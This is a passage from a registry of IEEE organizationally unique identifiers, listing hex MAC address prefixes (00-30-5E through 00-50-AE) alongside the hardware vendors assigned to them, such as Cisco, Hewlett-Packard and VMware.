(hex) DIGITRA SYSTEMS, INC. 00-30-5E (hex) Abelko Innovation 00-30-5F (hex) Hasselblad 00-30-60 (hex) Powerfile, Inc. 00-30-61 (hex) MobyTEL 00-30-62 (hex) PATH 1 NETWORK TECHNOL'S INC. 00-30-63 (hex) SANTERA SYSTEMS, INC. 00-30-64 (hex) ADLINK TECHNOLOGY, INC. 00-30-65 (hex) APPLE COMPUTER, INC. 00-30-66 (hex) RFM 00-30-67 (hex) BIOSTAR MICROTECH INT'L CORP. 00-30-68 (hex) CYBERNETICS TECH. CO., LTD. 00-30-69 (hex) IMPACCT TECHNOLOGY CORP. 00-30-6A (hex) PENTA MEDIA CO., LTD. 00-30-6B (hex) CMOS SYSTEMS, INC. 00-30-6C (hex) Hitex Holding GmbH 00-30-6D (hex) LUCENT TECHNOLOGIES 00-30-6E (hex) HEWLETT PACKARD 00-30-6F (hex) SEYEON TECH. CO., LTD. 00-30-70 (hex) 1Net Corporation 00-30-71 (hex) Cisco Systems, Inc. 00-30-72 (hex) Intellibyte Inc. 00-30-73 (hex) International Microsystems, In 00-30-74 (hex) EQUIINET LTD. 00-30-75 (hex) ADTECH 00-30-76 (hex) Akamba Corporation 00-30-77 (hex) ONPREM NETWORKS 00-30-78 (hex) Cisco Systems, Inc. 00-30-79 (hex) CQOS, INC. 00-30-7A (hex) Advanced Technology & Systems 00-30-7B (hex) Cisco Systems, Inc. 00-30-7C (hex) ADID SA 00-30-7D (hex) GRE AMERICA, INC. 00-30-7E (hex) Redflex Communication Systems 00-30-7F (hex) IRLAN LTD. 00-30-80 (hex) CISCO SYSTEMS, INC. 00-30-81 (hex) ALTOS C&C 00-30-82 (hex) TAIHAN ELECTRIC WIRE CO., LTD. 00-30-83 (hex) Ivron Systems 00-30-84 (hex) ALLIED TELESYN INTERNAIONAL 00-30-85 (hex) CISCO SYSTEMS, INC. 00-30-86 (hex) Transistor Devices, Inc. 00-30-87 (hex) VEGA GRIESHABER KG 00-30-88 (hex) Ericsson 00-30-89 (hex) Spectrapoint Wireless, LLC 00-30-8A (hex) NICOTRA SISTEMI S.P.A 00-30-8B (hex) Brix Networks 00-30-8C (hex) Quantum Corporation 00-30-8D (hex) Pinnacle Systems, Inc. 00-30-8E (hex) CROSS MATCH TECHNOLOGIES, INC. 00-30-8F (hex) MICRILOR, Inc. 00-30-90 (hex) CYRA TECHNOLOGIES, INC. 00-30-91 (hex) TAIWAN FIRST LINE ELEC. CORP. 00-30-92 (hex) ModuNORM GmbH 00-30-93 (hex) Sonnet Technologies, Inc 00-30-94 (hex) Cisco Systems, Inc. 00-30-95 (hex) Procomp Informatics, Ltd. 00-30-96 (hex) CISCO SYSTEMS, INC. 00-30-97 (hex) AB Regin 00-30-98 (hex) Global Converging Technologies 00-30-99 (hex) BOENIG UND KALLENBACH OHG 00-30-9A (hex) ASTRO TERRA CORP. 00-30-9B (hex) Smartware 00-30-9C (hex) Timing Applications, Inc. 00-30-9D (hex) Nimble Microsystems, Inc. 00-30-9E (hex) WORKBIT CORPORATION. 00-30-9F (hex) AMBER NETWORKS 00-30-A0 (hex) TYCO SUBMARINE SYSTEMS, LTD. 00-30-A1 (hex) WEBGATE Inc. 00-30-A2 (hex) Lightner Engineering 00-30-A3 (hex) CISCO SYSTEMS, INC. 00-30-A4 (hex) Woodwind Communications System 00-30-A5 (hex) ACTIVE POWER 00-30-A6 (hex) VIANET TECHNOLOGIES, LTD. 00-30-A7 (hex) SCHWEITZER ENGINEERING 00-30-A8 (hex) OL'E COMMUNICATIONS, INC. 00-30-A9 (hex) Netiverse, Inc. 00-30-AA (hex) AXUS MICROSYSTEMS, INC. 00-30-AB (hex) DELTA NETWORKS, INC. 00-30-AC (hex) Systeme Lauer GmbH & Co., Ltd. 00-30-AD (hex) SHANGHAI COMMUNICATION 00-30-AE (hex) Times N System, Inc. 00-30-AF (hex) Honeywell GmbH 00-30-B0 (hex) Convergenet Technologies 00-30-B1 (hex) TrunkNet 00-30-B2 (hex) L-3 Sonoma EO 00-30-B3 (hex) San Valley Systems, Inc. 00-30-B4 (hex) INTERSIL CORP. 00-30-B5 (hex) Tadiran Microwave Networks 00-30-B6 (hex) CISCO SYSTEMS, INC. 00-30-B7 (hex) Teletrol Systems, Inc. 00-30-B8 (hex) RiverDelta Networks 00-30-B9 (hex) ECTEL 00-30-BA (hex) AC&T SYSTEM CO., LTD. 00-30-BB (hex) CacheFlow, Inc. 00-30-BC (hex) Optronic AG 00-30-BD (hex) BELKIN COMPONENTS 00-30-BE (hex) City-Net Technology, Inc. 00-30-BF (hex) MULTIDATA GMBH 00-30-C0 (hex) Lara Technology, Inc. 00-30-C1 (hex) HEWLETT-PACKARD 00-30-C2 (hex) COMONE 00-30-C3 (hex) FLUECKIGER ELEKTRONIK AG 00-30-C4 (hex) Canon Imaging Systems Inc. 00-30-C5 (hex) CADENCE DESIGN SYSTEMS 00-30-C6 (hex) CONTROL SOLUTIONS, INC. 00-30-C7 (hex) Macromate Corp. 00-30-C8 (hex) GAD LINE, LTD. 00-30-C9 (hex) LuxN, N 00-30-CA (hex) Discovery Com 00-30-CB (hex) OMNI FLOW COMPUTERS, INC. 00-30-CC (hex) Tenor Networks, Inc. 00-30-CD (hex) CONEXANT SYSTEMS, INC. 00-30-CE (hex) Zaffire 00-30-CF (hex) TWO TECHNOLOGIES, INC. 00-30-D0 (hex) Tellabs 00-30-D1 (hex) INOVA CORPORATION 00-30-D2 (hex) WIN TECHNOLOGIES, CO., LTD. 00-30-D3 (hex) Agilent Technologies 00-30-D4 (hex) AAE Systems, Inc 00-30-D5 (hex) DResearch GmbH 00-30-D6 (hex) MSC VERTRIEBS GMBH 00-30-D7 (hex) Innovative Systems, L.L.C. 00-30-D8 (hex) SITEK 00-30-D9 (hex) DATACORE SOFTWARE CORP. 00-30-DA (hex) COMTREND CO. 00-30-DB (hex) Mindready Solutions, Inc. 00-30-DC (hex) RIGHTECH CORPORATION 00-30-DD (hex) INDIGITA CORPORATION 00-30-DE (hex) WAGO Kontakttechnik GmbH 00-30-DF (hex) KB/TEL TELECOMUNICACIONES 00-30-E0 (hex) OXFORD SEMICONDUCTOR LTD. 00-30-E1 (hex) Network Equipment Technologies, Inc. 00-30-E2 (hex) GARNET SYSTEMS CO., LTD. 00-30-E3 (hex) SEDONA NETWORKS CORP. 00-30-E4 (hex) CHIYODA SYSTEM RIKEN 00-30-E5 (hex) Amper Datos S.A. 00-30-E6 (hex) Draeger Medical Systems, Inc. 00-30-E7 (hex) CNF MOBILE SOLUTIONS, INC. 00-30-E8 (hex) ENSIM CORP. 00-30-E9 (hex) GMA COMMUNICATION MANUFACT'G 00-30-EA (hex) TeraForce Technology Corporation 00-30-EB (hex) TURBONET COMMUNICATIONS, INC. 00-30-EC (hex) BORGARDT 00-30-ED (hex) Expert Magnetics Corp. 00-30-EE (hex) DSG Technology, Inc. 00-30-EF (hex) NEON TECHNOLOGY, INC. 00-30-F0 (hex) Uniform Industrial Corp. 00-30-F1 (hex) Accton Technology Corp. 00-30-F2 (hex) CISCO SYSTEMS, INC. 00-30-F3 (hex) At Work Computers 00-30-F4 (hex) STARDOT TECHNOLOGIES 00-30-F5 (hex) Wild Lab. Ltd. 1-33-17-604 Harayama 00-30-F6 (hex) SECURELOGIX CORPORATION 00-30-F7 (hex) RAMIX INC. 00-30-F8 (hex) Dynapro Systems, Inc. 00-30-F9 (hex) Sollae Systems Co., Ltd. 00-30-FA (hex) TELICA, INC. 00-30-FB (hex) AZS Technology AG 00-30-FC (hex) Terawave Communications, Inc. 00-30-FD (hex) INTEGRATED SYSTEMS DESIGN 00-30-FE (hex) DSA GmbH 00-30-FF (hex) DATAFAB SYSTEMS, INC. 00-33-6C (hex) SynapSense Corporation 00-34-F1 (hex) Radicom Research, Inc. 00-35-32 (hex) Electro-Metrics Corporation 00-37-6D (hex) Murata Manufacturing Co., Ltd. 00-3A-98 (hex) Cisco Systems 00-3A-99 (hex) Cisco Systems 00-3A-9A (hex) Cisco Systems 00-3A-9B (hex) Cisco Systems 00-3A-9C (hex) Cisco Systems 00-3A-9D (hex) NEC AccessTechnica, Ltd. 00-3A-AF (hex) BlueBit Ltd. 00-3C-C5 (hex) WONWOO Engineering Co., Ltd 00-3D-41 (hex) Hatteland Computer AS 00-40-00 (hex) PCI COMPONENTES DA AMZONIA LTD 00-40-01 (hex) Zero One Technology Co. Ltd. 00-40-02 (hex) PERLE SYSTEMS LIMITED 00-40-03 (hex) Emerson Process Management Power & Water Solutions, Inc. 00-40-04 (hex) ICM CO. LTD. 00-40-05 (hex) ANI COMMUNICATIONS INC. 00-40-06 (hex) SAMPO TECHNOLOGY CORPORATION 00-40-07 (hex) TELMAT INFORMATIQUE 00-40-08 (hex) A PLUS INFO CORPORATION 00-40-09 (hex) TACHIBANA TECTRON CO., LTD. 00-40-0A (hex) PIVOTAL TECHNOLOGIES, INC. 00-40-0B (hex) CISCO SYSTEMS, INC. 00-40-0C (hex) GENERAL MICRO SYSTEMS, INC. 00-40-0D (hex) LANNET DATA COMMUNICATIONS,LTD 00-40-0E (hex) MEMOTEC, INC. 00-40-0F (hex) DATACOM TECHNOLOGIES 00-40-10 (hex) SONIC SYSTEMS, INC. 00-40-11 (hex) ANDOVER CONTROLS CORPORATION 00-40-12 (hex) WINDATA, INC. 00-40-13 (hex) NTT DATA COMM. SYSTEMS CORP. 00-40-14 (hex) COMSOFT GMBH 00-40-15 (hex) ASCOM INFRASYS AG 00-40-16 (hex) ADC - Global Connectivity Solutions Division 00-40-17 (hex) Silex Technology America 00-40-18 (hex) ADOBE SYSTEMS, INC. 00-40-19 (hex) AEON SYSTEMS, INC. 00-40-1A (hex) FUJI ELECTRIC CO., LTD. 00-40-1B (hex) PRINTER SYSTEMS CORP. 00-40-1C (hex) AST RESEARCH, INC. 00-40-1D (hex) INVISIBLE SOFTWARE, INC. 00-40-1E (hex) ICC 00-40-1F (hex) COLORGRAPH LTD 00-40-20 (hex) TE Connectivity Ltd. 00-40-21 (hex) RASTER GRAPHICS 00-40-22 (hex) KLEVER COMPUTERS, INC. 00-40-23 (hex) LOGIC CORPORATION 00-40-24 (hex) COMPAC INC. 00-40-25 (hex) MOLECULAR DYNAMICS 00-40-26 (hex) Buffalo, Inc 00-40-27 (hex) SMC MASSACHUSETTS, INC. 00-40-28 (hex) NETCOMM LIMITED 00-40-29 (hex) COMPEX 00-40-2A (hex) CANOGA-PERKINS 00-40-2B (hex) TRIGEM COMPUTER, INC. 00-40-2C (hex) ISIS DISTRIBUTED SYSTEMS, INC. 00-40-2D (hex) HARRIS ADACOM CORPORATION 00-40-2E (hex) PRECISION SOFTWARE, INC. 00-40-2F (hex) XLNT DESIGNS INC. 00-40-30 (hex) GK COMPUTER 00-40-31 (hex) KOKUSAI ELECTRIC CO., LTD 00-40-32 (hex) DIGITAL COMMUNICATIONS 00-40-33 (hex) ADDTRON TECHNOLOGY CO., LTD. 00-40-34 (hex) BUSTEK CORPORATION 00-40-35 (hex) OPCOM 00-40-36 (hex) TRIBE COMPUTER WORKS, INC. 00-40-37 (hex) SEA-ILAN, INC. 00-40-38 (hex) TALENT ELECTRIC INCORPORATED 00-40-39 (hex) OPTEC DAIICHI DENKO CO., LTD. 00-40-3A (hex) IMPACT TECHNOLOGIES 00-40-3B (hex) SYNERJET INTERNATIONAL CORP. 00-40-3C (hex) FORKS, INC. 00-40-3D (hex) TERADATA 00-40-3E (hex) RASTER OPS CORPORATION 00-40-3F (hex) SSANGYONG COMPUTER SYSTEMS 00-40-40 (hex) RING ACCESS, INC. 00-40-41 (hex) FUJIKURA LTD. 00-40-42 (hex) N.A.T. GMBH 00-40-43 (hex) Nokia Siemens Networks GmbH & Co. KG. 00-40-44 (hex) QNIX COMPUTER CO., LTD. 00-40-45 (hex) TWINHEAD CORPORATION 00-40-46 (hex) UDC RESEARCH LIMITED 00-40-47 (hex) WIND RIVER SYSTEMS 00-40-48 (hex) SMD INFORMATICA S.A. 00-40-49 (hex) Roche Diagnostics Ltd. 00-40-4A (hex) WEST AUSTRALIAN DEPARTMENT 00-40-4B (hex) MAPLE COMPUTER SYSTEMS 00-40-4C (hex) HYPERTEC PTY LTD. 00-40-4D (hex) TELECOMMUNICATIONS TECHNIQUES 00-40-4E (hex) FLUENT, INC. 00-40-4F (hex) SPACE & NAVAL WARFARE SYSTEMS 00-40-50 (hex) IRONICS, INCORPORATED 00-40-51 (hex) GRACILIS, INC. 00-40-52 (hex) STAR TECHNOLOGIES, INC. 00-40-53 (hex) AMPRO COMPUTERS 00-40-54 (hex) CONNECTION MACHINES SERVICES 00-40-55 (hex) METRONIX GMBH 00-40-56 (hex) MCM JAPAN LTD. 00-40-57 (hex) LOCKHEED - SANDERS 00-40-58 (hex) KRONOS, INC. 00-40-59 (hex) YOSHIDA KOGYO K. K. 00-40-5A (hex) GOLDSTAR INFORMATION & COMM. 00-40-5B (hex) FUNASSET LIMITED 00-40-5C (hex) FUTURE SYSTEMS, INC. 00-40-5D (hex) STAR-TEK, INC. 00-40-5E (hex) NORTH HILLS ISRAEL 00-40-5F (hex) AFE COMPUTERS LTD. 00-40-60 (hex) COMENDEC LTD 00-40-61 (hex) DATATECH ENTERPRISES CO., LTD. 00-40-62 (hex) E-SYSTEMS, INC./GARLAND DIV. 00-40-63 (hex) VIA TECHNOLOGIES, INC. 00-40-64 (hex) KLA INSTRUMENTS CORPORATION 00-40-65 (hex) GTE SPACENET 00-40-66 (hex) HITACHI CABLE, LTD. 00-40-67 (hex) OMNIBYTE CORPORATION 00-40-68 (hex) EXTENDED SYSTEMS 00-40-69 (hex) LEMCOM SYSTEMS, INC. 00-40-6A (hex) KENTEK INFORMATION SYSTEMS,INC 00-40-6B (hex) SYSGEN 00-40-6C (hex) COPERNIQUE 00-40-6D (hex) LANCO, INC. 00-40-6E (hex) COROLLARY, INC. 00-40-6F (hex) SYNC RESEARCH INC. 00-40-70 (hex) INTERWARE CO., LTD. 00-40-71 (hex) ATM COMPUTER GMBH 00-40-72 (hex) Applied Innovation Inc. 00-40-73 (hex) BASS ASSOCIATES 00-40-74 (hex) CABLE AND WIRELESS 00-40-75 (hex) M-TRADE (UK) LTD 00-40-76 (hex) Sun Conversion Technologies 00-40-77 (hex) MAXTON TECHNOLOGY CORPORATION 00-40-78 (hex) WEARNES AUTOMATION PTE LTD 00-40-79 (hex) JUKO MANUFACTURE COMPANY, LTD. 00-40-7A (hex) SOCIETE D'EXPLOITATION DU CNIT PARIS-LA-DEFENSE 00-40-7B (hex) SCIENTIFIC ATLANTA 00-40-7C (hex) QUME CORPORATION 00-40-7D (hex) EXTENSION TECHNOLOGY CORP. 00-40-7E (hex) EVERGREEN SYSTEMS, INC. 00-40-7F (hex) FLIR Systems 00-40-80 (hex) ATHENIX CORPORATION 00-40-81 (hex) MANNESMANN SCANGRAPHIC GMBH 00-40-82 (hex) LABORATORY EQUIPMENT CORP. 00-40-83 (hex) TDA INDUSTRIA DE PRODUTOS 00-40-84 (hex) HONEYWELL ACS 00-40-85 (hex) SAAB INSTRUMENTS AB 00-40-86 (hex) MICHELS & KLEBERHOFF COMPUTER 00-40-87 (hex) UBITREX CORPORATION 00-40-88 (hex) MOBIUS TECHNOLOGIES, INC. 00-40-89 (hex) MEIDENSHA CORPORATION 00-40-8A (hex) TPS TELEPROCESSING SYS. GMBH 00-40-8B (hex) RAYLAN CORPORATION 00-40-8C (hex) AXIS COMMUNICATIONS AB 00-40-8D (hex) THE GOODYEAR TIRE & RUBBER CO. 00-40-8E (hex) DIGILOG, INC. 00-40-8F (hex) WM-DATA MINFO AB 00-40-90 (hex) ANSEL COMMUNICATIONS 00-40-91 (hex) PROCOMP INDUSTRIA ELETRONICA 00-40-92 (hex) ASP COMPUTER PRODUCTS, INC. 00-40-93 (hex) PAXDATA NETWORKS LTD. 00-40-94 (hex) SHOGRAPHICS, INC. 00-40-95 (hex) R.P.T. INTERGROUPS INT'L LTD. 00-40-96 (hex) Cisco Systems, Inc. 00-40-97 (hex) DATEX DIVISION OF 00-40-98 (hex) DRESSLER GMBH & CO. 00-40-99 (hex) NEWGEN SYSTEMS CORP. 00-40-9A (hex) NETWORK EXPRESS, INC. 00-40-9B (hex) HAL COMPUTER SYSTEMS INC. 00-40-9C (hex) TRANSWARE 00-40-9D (hex) DIGIBOARD, INC. 00-40-9E (hex) CONCURRENT TECHNOLOGIES LTD. 00-40-9F (hex) Telco Systems, Inc. 00-40-A0 (hex) GOLDSTAR CO., LTD. 00-40-A1 (hex) ERGO COMPUTING 00-40-A2 (hex) KINGSTAR TECHNOLOGY INC. 00-40-A3 (hex) MICROUNITY SYSTEMS ENGINEERING 00-40-A4 (hex) ROSE ELECTRONICS 00-40-A5 (hex) CLINICOMP INTL. 00-40-A6 (hex) Cray, Inc. 00-40-A7 (hex) ITAUTEC PHILCO S.A. 00-40-A8 (hex) IMF INTERNATIONAL LTD. 00-40-A9 (hex) DATACOM INC. 00-40-AA (hex) VALMET AUTOMATION INC. 00-40-AB (hex) ROLAND DG CORPORATION 00-40-AC (hex) SUPER WORKSTATION, INC. 00-40-AD (hex) SMA REGELSYSTEME GMBH 00-40-AE (hex) DELTA CONTROLS, INC. 00-40-AF (hex) DIGITAL PRODUCTS, INC. 00-40-B0 (hex) BYTEX CORPORATION, ENGINEERING 00-40-B1 (hex) CODONICS INC. 00-40-B2 (hex) SYSTEMFORSCHUNG 00-40-B3 (hex) ParTech Inc. 00-40-B4 (hex) NEXTCOM K.K. 00-40-B5 (hex) VIDEO TECHNOLOGY COMPUTERS LTD 00-40-B6 (hex) COMPUTERM CORPORATION 00-40-B7 (hex) STEALTH COMPUTER SYSTEMS 00-40-B8 (hex) IDEA ASSOCIATES 00-40-B9 (hex) MACQ ELECTRONIQUE SA 00-40-BA (hex) ALLIANT COMPUTER SYSTEMS CORP. 00-40-BB (hex) GOLDSTAR CABLE CO., LTD. 00-40-BC (hex) ALGORITHMICS LTD. 00-40-BD (hex) STARLIGHT NETWORKS, INC. 00-40-BE (hex) BOEING DEFENSE & SPACE 00-40-BF (hex) CHANNEL SYSTEMS INTERN'L INC. 00-40-C0 (hex) VISTA CONTROLS CORPORATION 00-40-C1 (hex) BIZERBA-WERKE WILHEIM KRAUT 00-40-C2 (hex) APPLIED COMPUTING DEVICES 00-40-C3 (hex) FISCHER AND PORTER CO. 00-40-C4 (hex) KINKEI SYSTEM CORPORATION 00-40-C5 (hex) MICOM COMMUNICATIONS INC. 00-40-C6 (hex) FIBERNET RESEARCH, INC. 00-40-C7 (hex) RUBY TECH CORPORATION 00-40-C8 (hex) MILAN TECHNOLOGY CORPORATION 00-40-C9 (hex) NCUBE 00-40-CA (hex) FIRST INTERNAT'L COMPUTER, INC 00-40-CB (hex) LANWAN TECHNOLOGIES 00-40-CC (hex) SILCOM MANUF'G TECHNOLOGY INC. 00-40-CD (hex) TERA MICROSYSTEMS, INC. 00-40-CE (hex) NET-SOURCE, INC. 00-40-CF (hex) STRAWBERRY TREE, INC. 00-40-D0 (hex) MITAC INTERNATIONAL CORP. 00-40-D1 (hex) FUKUDA DENSHI CO., LTD. 00-40-D2 (hex) PAGINE CORPORATION 00-40-D3 (hex) KIMPSION INTERNATIONAL CORP. 00-40-D4 (hex) GAGE TALKER CORP. 00-40-D5 (hex) Sartorius Mechatronics T&H GmbH 00-40-D6 (hex) LOCAMATION B.V. 00-40-D7 (hex) STUDIO GEN INC. 00-40-D8 (hex) OCEAN OFFICE AUTOMATION LTD. 00-40-D9 (hex) AMERICAN MEGATRENDS INC. 00-40-DA (hex) TELSPEC LTD 00-40-DB (hex) ADVANCED TECHNICAL SOLUTIONS 00-40-DC (hex) TRITEC ELECTRONIC GMBH 00-40-DD (hex) HONG TECHNOLOGIES 00-40-DE (hex) Elsag Datamat spa 00-40-DF (hex) DIGALOG SYSTEMS, INC. 00-40-E0 (hex) ATOMWIDE LTD. 00-40-E1 (hex) MARNER INTERNATIONAL, INC. 00-40-E2 (hex) MESA RIDGE TECHNOLOGIES, INC. 00-40-E3 (hex) QUIN SYSTEMS LTD 00-40-E4 (hex) E-M TECHNOLOGY, INC. 00-40-E5 (hex) SYBUS CORPORATION 00-40-E6 (hex) C.A.E.N. 00-40-E7 (hex) ARNOS INSTRUMENTS & COMPUTER 00-40-E8 (hex) CHARLES RIVER DATA SYSTEMS,INC 00-40-E9 (hex) ACCORD SYSTEMS, INC. 00-40-EA (hex) PLAIN TREE SYSTEMS INC 00-40-EB (hex) MARTIN MARIETTA CORPORATION 00-40-EC (hex) MIKASA SYSTEM ENGINEERING 00-40-ED (hex) NETWORK CONTROLS INT'NATL INC. 00-40-EE (hex) OPTIMEM 00-40-EF (hex) HYPERCOM, INC. 00-40-F0 (hex) MicroBrain,Inc. 00-40-F1 (hex) CHUO ELECTRONICS CO., LTD. 00-40-F2 (hex) JANICH & KLASS COMPUTERTECHNIK 00-40-F3 (hex) NETCOR 00-40-F4 (hex) CAMEO COMMUNICATIONS, INC. 00-40-F5 (hex) OEM ENGINES 00-40-F6 (hex) KATRON COMPUTERS INC. 00-40-F7 (hex) Polaroid Corporation 00-40-F8 (hex) SYSTEMHAUS DISCOM 00-40-F9 (hex) COMBINET 00-40-FA (hex) MICROBOARDS, INC. 00-40-FB (hex) CASCADE COMMUNICATIONS CORP. 00-40-FC (hex) IBR COMPUTER TECHNIK GMBH 00-40-FD (hex) LXE 00-40-FE (hex) SYMPLEX COMMUNICATIONS 00-40-FF (hex) TELEBIT CORPORATION 00-41-B4 (hex) Wuxi Zhongxing Optoelectronics Technology Co.,Ltd. 00-42-52 (hex) RLX Technologies 00-45-01 (hex) Versus Technology, Inc. 00-46-4B (hex) HUAWEI TECHNOLOGIES CO.,LTD 00-50-00 (hex) NEXO COMMUNICATIONS, INC. 00-50-01 (hex) YAMASHITA SYSTEMS CORP. 00-50-02 (hex) OMNISEC AG 00-50-03 (hex) Xrite Inc 00-50-04 (hex) 3COM CORPORATION 00-50-06 (hex) TAC AB 00-50-07 (hex) SIEMENS TELECOMMUNICATION SYSTEMS LIMITED 00-50-08 (hex) TIVA MICROCOMPUTER CORP. (TMC) 00-50-09 (hex) PHILIPS BROADBAND NETWORKS 00-50-0A (hex) IRIS TECHNOLOGIES, INC. 00-50-0B (hex) CISCO SYSTEMS, INC. 00-50-0C (hex) e-Tek Labs, Inc. 00-50-0D (hex) SATORI ELECTORIC CO., LTD. 00-50-0E (hex) CHROMATIS NETWORKS, INC. 00-50-0F (hex) CISCO SYSTEMS, INC. 00-50-10 (hex) NovaNET Learning, Inc. 00-50-12 (hex) CBL - GMBH 00-50-13 (hex) Chaparral Network Storage 00-50-14 (hex) CISCO SYSTEMS, INC. 00-50-15 (hex) BRIGHT STAR ENGINEERING 00-50-16 (hex) SST/WOODHEAD INDUSTRIES 00-50-17 (hex) RSR S.R.L. 00-50-18 (hex) AMIT, Inc. 00-50-19 (hex) SPRING TIDE NETWORKS, INC. 00-50-1A (hex) IQinVision 00-50-1B (hex) ABL CANADA, INC. 00-50-1C (hex) JATOM SYSTEMS, INC. 00-50-1E (hex) Miranda Technologies, Inc. 00-50-1F (hex) MRG SYSTEMS, LTD. 00-50-20 (hex) MEDIASTAR CO., LTD. 00-50-21 (hex) EIS INTERNATIONAL, INC. 00-50-22 (hex) ZONET TECHNOLOGY, INC. 00-50-23 (hex) PG DESIGN ELECTRONICS, INC. 00-50-24 (hex) NAVIC SYSTEMS, INC. 00-50-26 (hex) COSYSTEMS, INC. 00-50-27 (hex) GENICOM CORPORATION 00-50-28 (hex) AVAL COMMUNICATIONS 00-50-29 (hex) 1394 PRINTER WORKING GROUP 00-50-2A (hex) CISCO SYSTEMS, INC. 00-50-2B (hex) GENRAD LTD. 00-50-2C (hex) SOYO COMPUTER, INC. 00-50-2D (hex) ACCEL, INC. 00-50-2E (hex) CAMBEX CORPORATION 00-50-2F (hex) TollBridge Technologies, Inc. 00-50-30 (hex) FUTURE PLUS SYSTEMS 00-50-31 (hex) AEROFLEX LABORATORIES, INC. 00-50-32 (hex) PICAZO COMMUNICATIONS, INC. 00-50-33 (hex) MAYAN NETWORKS 00-50-36 (hex) NETCAM, LTD. 00-50-37 (hex) KOGA ELECTRONICS CO. 00-50-38 (hex) DAIN TELECOM CO., LTD. 00-50-39 (hex) MARINER NETWORKS 00-50-3A (hex) DATONG ELECTRONICS LTD. 00-50-3B (hex) MEDIAFIRE CORPORATION 00-50-3C (hex) TSINGHUA NOVEL ELECTRONICS 00-50-3E (hex) CISCO SYSTEMS, INC. 00-50-3F (hex) ANCHOR GAMES 00-50-40 (hex) Panasonic Electric Works Co., Ltd. 00-50-41 (hex) Coretronic Corporation 00-50-42 (hex) SCI MANUFACTURING SINGAPORE PTE, LTD. 00-50-43 (hex) MARVELL SEMICONDUCTOR, INC. 00-50-44 (hex) ASACA CORPORATION 00-50-45 (hex) RIOWORKS SOLUTIONS, INC. 00-50-46 (hex) MENICX INTERNATIONAL CO., LTD. 00-50-47 (hex) PRIVATE 00-50-48 (hex) INFOLIBRIA 00-50-49 (hex) Arbor Networks Inc 00-50-4A (hex) ELTECO A.S. 00-50-4B (hex) BARCONET N.V. 00-50-4C (hex) Galil Motion Control 00-50-4D (hex) Tokyo Electron Device Limited 00-50-4E (hex) SIERRA MONITOR CORP. 00-50-4F (hex) OLENCOM ELECTRONICS 00-50-50 (hex) CISCO SYSTEMS, INC. 00-50-51 (hex) IWATSU ELECTRIC CO., LTD. 00-50-52 (hex) TIARA NETWORKS, INC. 00-50-53 (hex) CISCO SYSTEMS, INC. 00-50-54 (hex) CISCO SYSTEMS, INC. 00-50-55 (hex) DOMS A/S 00-50-56 (hex) VMware, Inc. 00-50-57 (hex) BROADBAND ACCESS SYSTEMS 00-50-58 (hex) VegaStream Group Limted 00-50-59 (hex) iBAHN 00-50-5A (hex) NETWORK ALCHEMY, INC. 00-50-5B (hex) KAWASAKI LSI U.S.A., INC. 00-50-5C (hex) TUNDO CORPORATION 00-50-5E (hex) DIGITEK MICROLOGIC S.A. 00-50-5F (hex) BRAND INNOVATORS 00-50-60 (hex) TANDBERG TELECOM AS 00-50-62 (hex) KOUWELL ELECTRONICS CORP. ** 00-50-63 (hex) OY COMSEL SYSTEM AB 00-50-64 (hex) CAE ELECTRONICS 00-50-65 (hex) TDK-Lambda Corporation 00-50-66 (hex) AtecoM GmbH advanced telecomunication modules 00-50-67 (hex) AEROCOMM, INC. 00-50-68 (hex) ELECTRONIC INDUSTRIES ASSOCIATION 00-50-69 (hex) PixStream Incorporated 00-50-6A (hex) EDEVA, INC. 00-50-6B (hex) SPX-ATEG 00-50-6C (hex) Beijer Electronics Products AB 00-50-6D (hex) VIDEOJET SYSTEMS 00-50-6E (hex) CORDER ENGINEERING CORPORATION 00-50-6F (hex) G-CONNECT 00-50-70 (hex) CHAINTECH COMPUTER CO., LTD. 00-50-71 (hex) AIWA CO., LTD. 00-50-72 (hex) CORVIS CORPORATION 00-50-73 (hex) CISCO SYSTEMS, INC. 00-50-74 (hex) ADVANCED HI-TECH CORP. 00-50-75 (hex) KESTREL SOLUTIONS 00-50-76 (hex) IBM Corp 00-50-77 (hex) PROLIFIC TECHNOLOGY, INC. 00-50-78 (hex) MEGATON HOUSE, LTD. 00-50-79 (hex) PRIVATE 00-50-7A (hex) XPEED, INC. 00-50-7B (hex) MERLOT COMMUNICATIONS 00-50-7C (hex) VIDEOCON AG 00-50-7D (hex) IFP 00-50-7E (hex) NEWER TECHNOLOGY 00-50-7F (hex) DrayTek Corp. 00-50-80 (hex) CISCO SYSTEMS, INC. 00-50-81 (hex) MURATA MACHINERY, LTD. 00-50-82 (hex) FORESSON CORPORATION 00-50-83 (hex) GILBARCO, INC. 00-50-84 (hex) ATL PRODUCTS 00-50-86 (hex) TELKOM SA, LTD. 00-50-87 (hex) TERASAKI ELECTRIC CO., LTD. 00-50-88 (hex) AMANO CORPORATION 00-50-89 (hex) SAFETY MANAGEMENT SYSTEMS 00-50-8B (hex) Hewlett-Packard Company 00-50-8C (hex) RSI SYSTEMS 00-50-8D (hex) ABIT COMPUTER CORPORATION 00-50-8E (hex) OPTIMATION, INC. 00-50-8F (hex) ASITA TECHNOLOGIES INT'L LTD. 00-50-90 (hex) DCTRI 00-50-91 (hex) NETACCESS, INC. 00-50-92 (hex) RIGAKU INDUSTRIAL CORPORATION 00-50-93 (hex) BOEING 00-50-94 (hex) PACE plc 00-50-95 (hex) PERACOM NETWORKS 00-50-96 (hex) SALIX TECHNOLOGIES, INC. 00-50-97 (hex) MMC-EMBEDDED COMPUTERTECHNIK GmbH 00-50-98 (hex) GLOBALOOP, LTD. 00-50-99 (hex) 3COM EUROPE, LTD. 00-50-9A (hex) TAG ELECTRONIC SYSTEMS 00-50-9B (hex) SWITCHCORE AB 00-50-9C (hex) BETA RESEARCH 00-50-9D (hex) THE INDUSTREE B.V. 00-50-9E (hex) Les Technologies SoftAcoustik Inc. 00-50-9F (hex) HORIZON COMPUTER 00-50-A0 (hex) DELTA COMPUTER SYSTEMS, INC. 00-50-A1 (hex) CARLO GAVAZZI, INC. 00-50-A2 (hex) CISCO SYSTEMS, INC. 00-50-A3 (hex) TransMedia Communications, Inc. 00-50-A4 (hex) IO TECH, INC. 00-50-A5 (hex) CAPITOL BUSINESS SYSTEMS, LTD. 00-50-A6 (hex) OPTRONICS 00-50-A7 (hex) CISCO SYSTEMS, INC. 00-50-A8 (hex) OpenCon Systems, Inc. 00-50-A9 (hex) MOLDAT WIRELESS TECHNOLGIES 00-50-AA (hex) KONICA MINOLTA HOLDINGS, INC. 00-50-AB (hex) NALTEC, Inc. 00-50-AC (hex) MAPLE COMPUTER CORPORATION 00-50-AD (hex) CommUnique Wireless Corp. 00-50-AE 